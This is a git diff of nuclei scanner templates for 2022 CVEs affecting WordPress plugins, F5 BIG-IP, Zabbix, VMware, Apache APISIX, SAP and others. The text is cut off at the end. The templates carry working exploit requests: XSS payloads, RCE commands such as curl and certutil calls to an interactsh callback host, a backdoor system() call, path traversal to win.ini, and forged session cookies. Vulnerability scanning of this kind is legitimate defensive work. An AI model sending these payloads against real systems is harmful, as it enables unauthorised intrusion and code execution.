severity: medium + description: | + Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + reference: + - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1221 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - " popup-" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/12 diff --git a/nuclei-templates/CVE-2022/cve-2022-1388.yaml b/nuclei-templates/CVE-2022/cve-2022-1388.yaml deleted file mode 100644 index 1ae0147265..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1388.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2022-1388-F5-RCE - -info: - name: CVE-2022-1388-F5-RCE - author: psc4re - severity: critical - tags: F5,BigIP,RCE,cve2022-1388 - reference: - - https://twitter.com/jas502n/status/1523611433938059265?s=20&t=Gj2puPeyO-xikJ3ONS4Lew - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 - -requests: - - raw: - - | - POST /mgmt/tm/util/bash HTTP/1.1 - Connection: keep-alive, X-F5-Auth-Token - X-F5-Auth-Token: anything - Authorization: Basic YWRtaW46 - Host: {{Hostname}} - - {"command":"run", "utilCmdArgs":"-c"} - - - matchers: - - type: dsl - dsl: - - contains(body, "tm:util:bash:runstate") && contains(body, "commandResult") && status_code==200 diff --git a/nuclei-templates/CVE-2022/cve-2022-1392.yaml b/nuclei-templates/CVE-2022/cve-2022-1392.yaml new file mode 100644 index 0000000000..b75a81b595 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1392.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-1392 + +info: + name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion + author: Veshraj + severity: high + description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + metadata: + verified: true + tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1609.yaml b/nuclei-templates/CVE-2022/cve-2022-1609.yaml deleted file mode 100644 index 83188b53b1..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1609.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-1609 - -info: - name: The School Management < 9.9.7 - Remote Code Execution - author: For3stCo1d - severity: critical - description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. - reference: - - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609 - metadata: - verified: false - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: CVE-2022-1609 - cwe-id: CWE-77 - tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress - -variables: - cmd: "echo CVE-2022-1609 | rev" - -requests: - - raw: - - | - POST /wp-json/am-member/license HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - blowfish=1&blowf=system('{{cmd}}'); - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '9061-2202-EVC' - -# Enhanced by mp on 2022/05/27 diff --git a/nuclei-templates/CVE-2022/cve-2022-1904.yaml b/nuclei-templates/CVE-2022/cve-2022-1904.yaml new file mode 100644 index 0000000000..37cac91201 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1904.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-1904 + +info: + name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. + reference: + - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b + - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1904 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ' - Color' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-1906.yaml b/nuclei-templates/CVE-2022/cve-2022-1906.yaml new file mode 100644 index 0000000000..0cf1efbc16 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1906.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-1906 + +info: + name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting + author: random-robbie + severity: medium + description: | + WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + reference: + - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1906 + cwe-id: CWE-79 + metadata: + google-query: inurl:/wp-content/plugins/digiproveblog + verified: "true" + tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 + +requests: + - raw: + - | + GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "got message " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml deleted file mode 100644 index 2a4dc2ff2e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21500.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-21500 - -info: - name: Oracle E-Business Suite <=12.2 - Authentication Bypass - author: 0xpugazh - severity: high - description: | - Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. - remediation: | - Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. - reference: - - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - - https://twitter.com/GodfatherOrwa/status/1514720677173026816 - - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 - - https://www.oracle.com/security-alerts/cpujul2022.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-21500 - epss-score: 0.29303 - epss-percentile: 0.96354 - cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: oracle - product: e-business_suite - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 - tags: cve,cve2022,oracle,misconfig,auth-bypass - -http: - - method: GET - path: - - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - 'Registration' - - 'Register as individual' - - '' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-2187.yaml b/nuclei-templates/CVE-2022/cve-2022-2187.yaml new file mode 100644 index 0000000000..76ce320f26 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-2187.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-2187 + +info: + name: WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting + author: For3stCo1d + severity: medium + description: | + WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute. + reference: + - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d + - https://wordpress.org/plugins/contact-form-7-simple-recaptcha + - https://nvd.nist.gov/vuln/detail/CVE-2022-2187 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-2187 + cwe-id: CWE-79 + tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&">' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Contact Form 7" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-22536.yaml b/nuclei-templates/CVE-2022/cve-2022-22536.yaml new file mode 100644 index 0000000000..7b9308b289 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-22536.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-22536 + +info: + name: SAP Memory Pipes (MPI) Desynchronization + author: pdteam + severity: critical + description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 + - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 + - https://github.com/Onapsis/onapsis_icmad_scanner + - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2022-22536 + cwe-id: CWE-444 + tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes + +requests: + - raw: + - |+ + GET {{sap_path}} HTTP/1.1 + Host: {{Hostname}} + Content-Length: 82646 + Connection: keep-alive + + {{repeat("A", 82642)}} + + GET / HTTP/1.1 + Host: {{Hostname}} + + payloads: + sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner + - /sap/admin/public/default.html + - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png + + unsafe: true + read-all: true + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: dsl + dsl: + - "contains(tolower(body), 'administration')" # confirms 1st path + - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path + condition: or + + - type: word + part: body + words: + - "HTTP/1.0 400 Bad Request" # error in concatenated response + - "HTTP/1.0 500 Internal Server Error" + - "HTTP/1.0 500 Dispatching Error" + condition: or + +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-22972.yaml b/nuclei-templates/CVE-2022/cve-2022-22972.yaml new file mode 100644 index 0000000000..dc44fa1296 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-22972.yaml @@ -0,0 +1,106 @@ +id: CVE-2022-22972 + +info: + name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass + author: For3stCo1d,princechaddha + severity: critical + description: | + VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + reference: + - https://github.com/horizon3ai/CVE-2022-22972 + - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive + - https://www.vmware.com/security/advisories/VMSA-2022-0014.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22972 + cwe-id: CWE-287 + metadata: + fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + tags: cve,cve2022,vmware,auth-bypass,oast + +requests: + - raw: + - | + GET /vcac/ HTTP/1.1 + Host: {{Hostname}} + + - | + GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 + Host: {{Hostname}} + + - | + POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 + Host: {{interactsh-url}} + Content-type: application/x-www-form-urlencoded + + protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in + + host-redirects: true + max-redirects: 3 + cookie-reuse: true + extractors: + - type: regex + part: body + name: protected_state + group: 1 + regex: + - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' + internal: true + + - type: regex + part: body + name: horizonRelayState + group: 1 + regex: + - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' + internal: true + + - type: regex + part: body + name: userstore + group: 1 + regex: + - 'id="userstore" value="([a-z.]+)" \/>' + internal: true + + - type: regex + part: body + name: userstoreDisplay + group: 1 + regex: + - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' + internal: true + + - type: regex + part: body + name: stickyConnectorId + group: 1 + regex: + - 'name="stickyConnectorId" value="(.*)"/>' + internal: true + + - type: kval + part: header + name: HZN-Cookie + kval: + - 'HZN' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "HZN=" + + - type: status + status: + - 302 + + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/cve-2022-23131.yaml b/nuclei-templates/CVE-2022/cve-2022-23131.yaml new file mode 100644 index 0000000000..0f93ea7161 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23131.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-23131 + +info: + name: Zabbix - SAML SSO Authentication Bypass + author: For3stCo1d + severity: critical + description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. + reference: + - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://github.com/1mxml/CVE-2022-23131 + metadata: + shodan-query: http.favicon.hash:892542951 + fofa-query: app="ZABBIX-监控系统" && body="saml" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.8 + cve-id: CVE-2022-23131 + tags: cve,cve2022,zabbix,auth-bypass,saml,sso + +requests: + - method: GET + path: + - "{{BaseURL}}/zabbix/index_sso.php" + - "{{BaseURL}}/index_sso.php" + + headers: + Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: dsl + dsl: + - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" diff --git a/nuclei-templates/CVE-2022/cve-2022-23134.yaml b/nuclei-templates/CVE-2022/cve-2022-23134.yaml new file mode 100644 index 0000000000..8a1b34df97 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23134.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-23134 + +info: + name: Zabbix Setup Configuration Authentication Bypass + author: bananabr + severity: medium + description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + reference: + - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage + - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 + - https://support.zabbix.com/browse/ZBX-20384 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-23134 + tags: cve,cve2022,zabbix,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/zabbix/setup.php" + - "{{BaseURL}}/setup.php" + + headers: + Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Database" + - "host" + - "port" + - "Zabbix" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-23779.yaml b/nuclei-templates/CVE-2022/cve-2022-23779.yaml deleted file mode 100644 index e42ca66955..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-23779.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2022-23779 - -info: - name: Zoho ManageEngine - Internal Hostname Disclosure - author: cckuailong - severity: medium - description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. - reference: - - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html - - https://github.com/fbusr/CVE-2022-23779 - - https://nvd.nist.gov/vuln/detail/CVE-2022-23779 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-23779 - cwe-id: CWE-200 - metadata: - fofa-query: app="ZOHO-ManageEngine-Desktop" - tags: cve,cve2022,zoho,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/themes" - - matchers-condition: and - matchers: - - type: status - status: - - 301 - - - type: word - part: header - words: - - '/themes/' - - 'text/html' - condition: and - - - type: word - part: location - words: - - '{{Host}}' - negative: true - - - type: word - words: - - '

301 Moved Permanently

' - - - type: regex - part: location - regex: - - 'https?:\/\/(.*):' - - extractors: - - type: regex - part: location - group: 1 - regex: - - 'https?:\/\/(.*):' - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/cve-2022-23881.yaml new file mode 100644 index 0000000000..73150a422c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23881.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-23881 + +info: + name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + tags: cve,cve2022,rce,zzzphp,zzzcms + +requests: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23944.yaml b/nuclei-templates/CVE-2022/cve-2022-23944.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23944.yaml rename to nuclei-templates/CVE-2022/cve-2022-23944.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-24112.yaml b/nuclei-templates/CVE-2022/cve-2022-24112.yaml new file mode 100644 index 0000000000..119a801f06 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24112.yaml @@ -0,0 +1,80 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX - Remote Code Execution + author: Mr-xn + severity: critical + description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + reference: + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + metadata: + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org + shodan-query: title:"Apache APISIX Dashboard" + tags: cve,cve2022,apache,rce,apisix,oast + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + { + "headers":{ + "X-Real-IP":"127.0.0.1", + "Content-Type":"application/json" + }, + "timeout":1500, + "pipeline":[ + { + "method":"PUT", + "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}" + } + ] + } + - | + GET /api/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '"reason":"OK"' + - '"status":200' + condition: and + + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - 'http' + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - 'GET \/([a-z-]+) HTTP' + +# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2022/cve-2022-24129.yaml b/nuclei-templates/CVE-2022/cve-2022-24129.yaml new file mode 100644 index 0000000000..9d3dc396c3 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24129.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-24129 + +info: + name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery + author: 0x_Akoko + severity: high + description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services. + reference: + - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF + - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP + - http://shibboleth.net/community/advisories/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-24129 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N + cvss-score: 8.2 + cve-id: CVE-2022-24129 + cwe-id: CWE-918 + tags: cve,cve2022,ssrf,oidc,shibboleth + +requests: + - method: GET + path: + - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: interactsh_request + words: + - "ShibbolethIdp" + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-24181.yaml b/nuclei-templates/CVE-2022/cve-2022-24181.yaml deleted file mode 100644 index e4d4fbe5a6..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-24181.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-24181 - -info: - name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting - author: lucasljm2001,ekrause - severity: medium - description: | - PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. - reference: - - https://www.exploit-db.com/exploits/50881 - - https://github.com/pkp/pkp-lib/issues/7649 - - https://youtu.be/v8-9evO2oVg - - https://nvd.nist.gov/vuln/detail/cve-2022-24181 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24181 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,oss,pkp-lib,edb - -requests: - - raw: - - | - GET /iupjournals/index.php/esj HTTP/2 - Host: {{Hostname}} - X-Forwarded-Host: foo">alert(document.domain)' + - '' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-26233.yaml b/nuclei-templates/CVE-2022/cve-2022-26233.yaml new file mode 100644 index 0000000000..7a7376e711 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26233.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-26233 + +info: + name: Barco Control Room Management Suite - Directory Traversal + author: 0x_Akoko + severity: high + description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + reference: + - https://0day.today/exploit/37579 + - https://www.cvedetails.com/cve/CVE-2022-26233 + - http://seclists.org/fulldisclosure/2022/Apr/0 + - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-26233 + cwe-id: CWE-22 + tags: cve,cve2022,barco,lfi + +requests: + - raw: + - |+ + GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-26960.yaml b/nuclei-templates/CVE-2022/cve-2022-26960.yaml new file mode 100644 index 0000000000..d244810944 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26960.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-26960 + 